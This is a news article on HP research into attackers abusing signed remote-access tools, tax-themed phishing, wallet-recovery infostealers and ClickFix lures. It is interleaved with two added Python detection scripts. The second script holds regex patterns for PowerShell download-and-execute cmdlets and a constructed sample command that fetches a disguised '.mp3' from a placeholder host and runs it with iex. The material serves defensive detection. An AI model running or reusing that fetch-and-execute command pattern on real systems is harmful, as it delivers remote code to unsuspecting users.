Business as Usual: How Attackers Are Turning IT Tools Into Backdoors

Cybercriminals are installing genuine, vendor-signed remote access software on victims' computers and quietly enrolling those machines into accounts they control, turning legitimate IT tools such as LogMeIn and ScreenConnect into persistent backdoors, according to research published by HP Inc.

The findings, set out in the company's latest Threat Insights Report, document campaigns in which attackers abandoned conventional malware in favour of trusted applications, leaving defenders with few of the signals they normally rely on to separate an intrusion from ordinary system administration.

The shift matters because it inverts the assumption underpinning most endpoint defence. Security tools are built to flag the unfamiliar: the unsigned binary, the connection to an untrustworthy domain, the executable that behaves unlike anything a legitimate user would run.

The campaigns analysed by HP Threat Research, drawn from telemetry covering January to March 2026, deliberately strip those signals away. The installed software is legitimate, the installer is signed, and the network traffic flows to the vendor's own infrastructure. The only malicious element is the question of who holds the account at the other end, which is precisely the kind of detail that endpoint tooling is not designed to interrogate.

The intrusion that looks identical to IT support

In the campaigns HP documented, attackers did not tamper with the remote access applications at all. They distributed the official installers and enrolled victim devices into accounts they themselves controlled, which allowed the activity to run over legitimate vendor infrastructure. That choice removed the indicators conventional malware tends to leave behind, and it meant a compromised machine connecting to LogMeIn looked no different from a corporate laptop being managed by a help desk. The approach also sidestepped one of the most reliable triggers for a security alert, the moment a program reaches out to a domain or address with no established reputation, because here the destination was a trusted vendor that thousands of legitimate businesses contact every day.

Patrick Schläpfer, Principal Threat Researcher at HP Security Lab, said the design of these campaigns was what set them apart. “What stands out in these campaigns is how easily legitimate remote access tools are being turned into entry points for attackers,” he said. “By combining trusted software with carefully designed social engineering – tied to events like the end of the tax year – it's getting even harder to distinguish what can and can't be trusted.” The timing was not incidental. Attackers built their lures around the year-end filing period, when individuals and businesses are gathering documents, submitting returns and paying tax bills, and when an email promising a secure way to transfer sensitive tax paperwork carries an air of routine rather than risk.

How the lure unfolds on the victim's screen

The campaigns reached users through phishing emails carrying PDF attachments that claimed to offer a secure document transfer. Opening the PDF directed the recipient to a webpage that appeared to load a document while quietly initiating the download of a password-protected archive, with the password supplied inside the original PDF so that gateway scanners could not easily inspect the contents before delivery. Inside the archive sat a VBScript file labelled as a tax summary, and opening it began a largely automated installation chain that fetched the final payload and requested the elevated privileges needed to complete the install through a standard User Account Control prompt, the kind a user clicks past without much thought.

What the user saw was reassuring by design. While the installer ran in the background, the script opened a browser page displaying a pre-generated tax document, giving the impression that the expected file had loaded as intended. The payload, in one case, was the official LogMeIn client, signed and legitimate. Attackers used command-line parameters to suppress the prompts that would normally announce that remote access software was being installed, and once the tool connected to the vendor's infrastructure under the attacker's account, it pulled down further components to survey the machine, checking patch levels, identifying installed security products and opening the door to browsing files or deploying additional tools. HP Threat Research observed the same remote access abuse outside tax-themed phishing, with attackers also using fake software-update prompts that claimed a user needed a newer version to view a document, alongside bogus desktop versions of mobile or command-line apps, including fake dating websites, spread through search engine poisoning and malvertising to push the same class of software onto victims.
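The installation chain above leaves a signed binary, vendor-side traffic and an attacker-owned account, so the useful telemetry is process lineage rather than reputation. The following added detection sketch is not code from the HP report or from any vendor; it runs over constructed process-creation events and flags a remote-access installer that is spawned by a script host, with unattended-install switches and elevation recorded as aggravating context. The executable names, paths and switches are assumptions: the report does not publish the parameters the attackers used, so the switch list is the generic NSIS/MSI/Inno set.

```python
"""Added example, not from the HP report: flag remote-access installers
launched from a script host, regardless of whether they are signed.
All events below are constructed for this example."""
import re
from dataclasses import dataclass, field

# Script interpreters the phishing chain runs the VBScript through (wscript)
# or commonly pivots to; treated as suspicious parents for an RMM installer.
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe", "powershell.exe"}

# Remote access tools named in the report; matched on the executable name.
# The file names in the sample events are assumptions, not vendor artefacts.
RMM_NAMES = ("logmein", "screenconnect", "netsupport")

# Generic unattended-install switches (NSIS /S, MSI /quiet|/qn, Inno /silent).
SILENT_SWITCHES = re.compile(r"(?i)(?<!\S)/(?:s|silent|verysilent|quiet|qn|q)(?!\S)")


@dataclass
class ProcessEvent:
    pid: int
    parent_image: str
    image: str
    command_line: str
    signed: bool      # Authenticode verdict as the EDR would report it
    elevated: bool    # process token is high-integrity (UAC consent given)


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def is_rmm(image: str) -> bool:
    name = basename(image)
    return any(tool in name for tool in RMM_NAMES)


def analyse(events):
    """Return one finding per RMM installer with a script-host parent.

    A signed installer pushed by a management agent is left alone: the
    signature is not the signal, the lineage is.
    """
    findings = []
    for ev in events:
        if not is_rmm(ev.image):
            continue  # non-RMM droppers are the job of other rules
        parent = basename(ev.parent_image)
        if parent not in SCRIPT_HOSTS:
            continue
        reasons = [f"launched by script host {parent}"]
        if SILENT_SWITCHES.search(ev.command_line):
            reasons.append("unattended install switch")
        if ev.elevated:
            reasons.append("elevated via UAC from script-host lineage")
        findings.append({
            "pid": ev.pid,
            "tool": basename(ev.image),
            "signed": ev.signed,
            "reasons": reasons,
        })
    return findings


# Constructed sample telemetry: one phishing-chain install, one help-desk
# push by a hypothetical corporate deployment agent, one unrelated dropper.
SAMPLE_EVENTS = [
    ProcessEvent(5120, r"C:\Windows\System32\wscript.exe",
                 r"C:\Users\jsmith\AppData\Local\Temp\LogMeInInstaller.exe",
                 r'"C:\Users\jsmith\AppData\Local\Temp\LogMeInInstaller.exe" /quiet',
                 signed=True, elevated=True),
    ProcessEvent(6104, r"C:\Program Files\CorpIT\deploy-agent.exe",   # hypothetical
                 r"C:\ProgramData\CorpIT\ScreenConnectSetup.exe",
                 r'"C:\ProgramData\CorpIT\ScreenConnectSetup.exe" /silent',
                 signed=True, elevated=True),
    ProcessEvent(6420, r"C:\Windows\System32\wscript.exe",
                 r"C:\Users\jsmith\AppData\Local\Temp\update.exe",
                 r'"C:\Users\jsmith\AppData\Local\Temp\update.exe"',
                 signed=False, elevated=False),
]

if __name__ == "__main__":
    for f in analyse(SAMPLE_EVENTS):
        print(f"pid {f['pid']} {f['tool']} signed={f['signed']}: " + "; ".join(f["reasons"]))
```

The point of the sample set is that the flagged event is the signed one: the deployment-agent push uses the same tool and the same silent switch and is correctly ignored, because the distinguishing fact is who launched the installer, not what it is.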

The wider pattern of attacks engineered to read as normal

The remote access campaigns were the clearest example of a broader theme running through the quarter. HP also documented fake cryptocurrency wallet recovery tools that claimed to help users locate lost wallets but instead harvested credentials, wallet data and system information before packaging it for exfiltration, in one case routing the stolen files out through a Discord webhook to spare the attacker the trouble of running dedicated command-and-control infrastructure. Shared through code-sharing platforms and media download sites, the emoji-filled infostealer scripts bore the hallmarks of AI-assisted “vibe coding,” and researchers found GitHub repositories reusing the same wallet-recovery decoy to distribute other stealers. The attack traded on desperation, since users hunting for a way to recover lost funds proved more willing to run an unfamiliar script that seemed to offer a direct fix to a high-value personal problem.

A separate strand of activity used ClickFix campaigns that disguised malware as audio files, walking victims through realistic CAPTCHA prompts on polished fake websites that copied a malicious command to the clipboard and instructed the user to run it. The downloaded file carried an extension associated with audio but in fact held script code, part of a layered chain that concealed an encoded PowerShell command and a further disguised download before reaching its payload. That chain delivered Amatera Stealer, an information stealer that targets credentials, browser cookies and cryptocurrency wallet data and can pull down follow-on payloads, including NetSupport, a legitimate remote management tool that attackers abuse to seize control of infected endpoints. Across the quarter, executable files were the most common malware delivery type at 39%, followed by archives at 38% and PDF documents at 10%, and at least 11% of email threats identified by HP Sure Click slipped past one or more email gateway scanners.
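The ClickFix chain hinges on the user pasting a command whose real content is hidden behind an encoded PowerShell argument and a file name with an audio extension. The added example below, which is not code from the HP report, decodes the `-EncodedCommand` argument (base64 over UTF-16LE, in any of the spellings powershell.exe accepts) from constructed process events and records why the launch looks like a ClickFix execution rather than an administrator's script. The sample one-liner, its `example.invalid` host and the corporate agent path are constructed for the example.

```python
"""Added example, not from the HP report: decode and triage an encoded
PowerShell launch of the kind a ClickFix lure asks the user to paste.
Events, paths and the decoded script are constructed for this example."""
import base64
import re

# powershell.exe accepts -e, -ec and any unambiguous prefix of
# -EncodedCommand; listing the forms explicitly keeps -ep / -ExecutionPolicy
# from matching. Longest alternatives first so the full word wins.
_FULL = "encodedcommand"
ENC_FORMS = {"e", "ec"} | {_FULL[:i] for i in range(2, len(_FULL) + 1)}
ENC_ARG = re.compile(
    r"(?i)(?<!\S)-(" + "|".join(sorted(ENC_FORMS, key=len, reverse=True))
    + r")\s+([A-Za-z0-9+/=]+)")
HIDDEN = re.compile(r"(?i)(?<!\S)-w(?:indowstyle)?\s+hidden")
DOWNLOAD = re.compile(
    r"(?i)\b(?:iwr|invoke-webrequest|downloadstring|downloadfile|invoke-expression|iex)\b")
AUDIO_EXT = re.compile(r"(?i)\.(?:mp3|wav|m4a|ogg)\b")


def decode_encoded_command(command_line: str):
    """Return the decoded script, or None if there is no valid encoded argument."""
    m = ENC_ARG.search(command_line)
    if not m:
        return None
    try:
        raw = base64.b64decode(m.group(2), validate=True)
        return raw.decode("utf-16-le")
    except ValueError:  # bad base64, bad padding, or odd-length/invalid UTF-16
        return None


def triage(event):
    """Return a finding for an encoded PowerShell launch, else None."""
    if "powershell" not in event["image"].lower():
        return None
    cmd = event["command_line"]
    decoded = decode_encoded_command(cmd)
    if decoded is None:
        return None
    reasons = []
    if event["parent_image"].lower().endswith("explorer.exe"):
        reasons.append("interactive launch (explorer.exe parent), consistent with a pasted Run-dialog command")
    if HIDDEN.search(cmd):
        reasons.append("hidden window")
    if DOWNLOAD.search(decoded):
        reasons.append("download/execute cmdlets in decoded script")
    if AUDIO_EXT.search(decoded):
        reasons.append("audio-extension file handled as script")
    return {"pid": event["pid"], "decoded": decoded, "reasons": reasons}


def triage_all(events):
    return [f for f in map(triage, events) if f is not None]


# Constructed sample: the decoy fetches a ".mp3" and runs it as script text.
SAMPLE_SCRIPT = ("iwr https://example.invalid/track.mp3 -OutFile $env:TEMP\\track.mp3; "
                 "iex (gc $env:TEMP\\track.mp3 -Raw)")
SAMPLE_B64 = base64.b64encode(SAMPLE_SCRIPT.encode("utf-16-le")).decode("ascii")

SAMPLE_EVENTS = [
    {"pid": 7012, "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": f"powershell.exe -w hidden -enc {SAMPLE_B64}"},
    {"pid": 7044, "parent_image": r"C:\Program Files\CorpIT\agent.exe",  # hypothetical
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": r"powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\ProgramData\CorpIT\inventory.ps1"},
    {"pid": 7090, "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\notepad.exe",
     "command_line": "notepad.exe"},
]

if __name__ == "__main__":
    for f in triage_all(SAMPLE_EVENTS):
        print(f"pid {f['pid']}: {f['decoded']}\n  " + "\n  ".join(f["reasons"]))
```

The benign administrative launch is skipped because `-ExecutionPolicy` is not an encoded-command spelling, and a malformed encoded argument decodes to `None` rather than raising, so the rule degrades quietly on garbage input instead of taking the pipeline down.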

Alex Holland, Principal Threat Researcher at HP Security Lab, said the common thread was how unremarkable the activity appeared from the inside. “These attacks don't look like break-ins – they look like business as usual, blending in with normal IT activity and avoiding the warning signs associated with malware,” he said. He argued that the answer lies in narrowing what attackers can do once a lure succeeds rather than relying solely on spotting them at the door. “To secure the future of work and reduce risk, organisations should restrict unnecessary privileges, control software installation, and isolate risky activity such as downloads and unknown links,” Holland said. “Detection alone is not enough when legitimate tools are being turned into backdoors.” For defenders, the report's underlying message is that the boundary between trusted and malicious software has become a question of context and ownership rather than code, and that the controls best suited to this shift are those that limit privilege and contain risky activity before an attacker can build on a foothold.

Sindhu V Kashyap

Global Technology Journalist & Multimedia Storyteller | Covering Founders, Investors & Leaders Reshaping Tech | Writer · Interviewer · Moderator · Editor
